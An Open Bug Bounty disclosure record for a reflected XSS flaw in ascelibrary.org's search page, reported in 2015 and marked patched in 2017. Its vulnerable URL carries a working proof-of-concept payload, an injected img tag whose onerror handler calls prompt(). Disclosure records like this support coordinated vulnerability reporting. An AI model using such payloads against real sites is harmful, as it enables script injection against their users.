ascelibrary.org XSS vulnerability

2015-02-15T09:52:00
ID OBB:54512
Type openbugbounty
Reporter en4rab
Modified 2017-11-21T20:50:00

Description

Vulnerable URL:
http://ascelibrary.org/action/doSearch?displaySummary=true⌖=default&text1;=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%28%27XSSPOSED%27%29%3E&field1;=AllField&logicalOpe1;=AND&text2;=&field2;=AllField&logicalOpe2;=AND&text3;=&field3;=AllField&logicalOpe3;=AND&text4;=&field4;=AllField&logicalOpe4;=AND&text5;=&field5;=AllField&logicalOpe5;=AND&text6;=&field6;=AllField&logicalOpe6;=AND&text7;=&field7;=AllField&publication;=&AfterMonth;=&AfterYear;=&BeforeMonth;=&BeforeYear;=
Details:

Description| Value
---|---
Patched:| Yes, at 21.11.2017
Latest check for patch:| 21.11.2017 20:50 GMT
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| 59658
Google Pagerank| 8
VIP website status:| Yes
Check ascelibrary.org SSL connection:| (Grade: B-)

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability reported| 15 February, 2015 09:52 GMT
Vulnerability existence verified and confirmed| 17 February, 2015 18:56 GMT
Vulnerability patched by the website owner| 21 November, 2017 20:50 GMT